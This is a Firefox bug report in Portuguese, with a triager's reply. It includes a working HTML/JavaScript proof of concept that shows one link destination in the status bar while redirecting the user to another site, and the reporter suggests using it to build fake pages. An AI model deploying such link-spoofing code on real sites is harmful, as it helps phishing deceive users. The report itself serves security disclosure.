One Way Links in camouflage StatusBar! When do you Onmouse on the link! Preview is changed!

RESOLVED DUPLICATE of bug 474967

Status

()

--
major
RESOLVED DUPLICATE of bug 474967
9 years ago
9 years ago

People

(Reporter: vag_bracker, Unassigned)

Tracking

Firefox Tracking Flags

(Not tracked)

Details

(URL)

(Reporter)

Description

9 years ago
User-Agent:       Mozilla/5.0 (Windows; U; Windows NT 6.1; pt-BR; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
Build Identifier: ALL

Olhem esse codigo, e salvem ele como .html e abram ele no navegador! ;)


<html>
<body>
<div id="mydiv"
onmouseover="document.location='http://www.orkut.com.br';"
style="position:absolute;width:2px;height:2px;background:#FFFFFF;border:0px"></div>
<script>
function updatebox(evt) {
mouseX=evt.pageX?evt.pageX:evt.clientX;
mouseY=evt.pageY?evt.pageY:evt.clientY;
document.getElementById('mydiv').style.left=mouseX-1;
document.getElementById('mydiv').style.top=mouseY-1;
}
</script>
<center>
<br>
<font style="font-family:arial;font-size:32px">Barra de Status Obfuscation
/ Clickjacking</font><br>
<font style="font-family:arial;font-size:24px">☻</font><br>
<br>
<hr size="3" width="500" color="#000000">
<br>
<font style="font-family:arial;font-size:20px">Você clicará na página do google e será direcionada para a página do orkut! (O.O)</font><br>
<br>
<a href="http://www.google.com.br" onclick="updatebox(event)"><font
style="font-family:arial;font-size:32px">http://www.google.com.br</font></a><br>
<br>
<hr size="3" width="500" color="#000000">
<br>
<font style="font-family:arial;font-size:16px">Falha muito perigosa não acha? ELA NÃO FUNCIONA SE VOCÊ MANDAR ABRIR A PAGINA POR UMA NOVA ABA!!!</font><br>
</center>
<div style="position:absolute;bottom:0;">
<font style="font-family:arial;font-size:32px">Veja aqui...<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;|&nbsp;<br>
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;V
</font>
</div>
</body>
</html>



Tentem e vejam! xD
Se desabilitar o JavaScript dae nao funfa! 
ABraço

Reproducible: Always

Steps to Reproduce:
1. Desenvolver o Código em JavaScript
2. Montar alguma pagina usando o metodo!
3. Fazer a festa com paginas fake!
Actual Results:  
Talvez alguns que saibam estão usando para fins pessoais!


Espero que tenha ajudado a todos com isso! e que tenha me expressado corretamente! Abraço!
E boa sorte ae! 

Aceito Trabalho! ^^
To com 15 anos!
This is not "clickjacking". This code obscures the destination of a link (there's many ways to do that, such as redirects) but you are not hiding the existence of a 3rd party page containing the link.

I've seen this example elsewhere, this is a duplicate. (also, it would be easier to achieve the same results by having the onclick just set document.location than to mess with moving the div around. Moving the div makes it superficially similar to clickjacking, but it isn't, really.)
Group: core-security
Summary: Uma Maneira de Camuflar Links na StatusBar! QUando ocorre o OnMouse sobre o link! O Preview é modificado! → One Way Links in camouflage StatusBar! When do you Onmouse on the link! Preview is changed!
Whiteboard: DUPEME
I guess I was remembering http://www.exploit-db.com/exploits/7842 from earlier in the year this was filed.
Alias: CVE-2009-0253
Whiteboard: DUPEME
Alias: CVE-2009-0253
Status: UNCONFIRMED → RESOLVED
Last Resolved: 9 years ago
Resolution: --- → DUPLICATE
Duplicate of bug: 474967
You need to log in before you can comment on or make changes to this bug.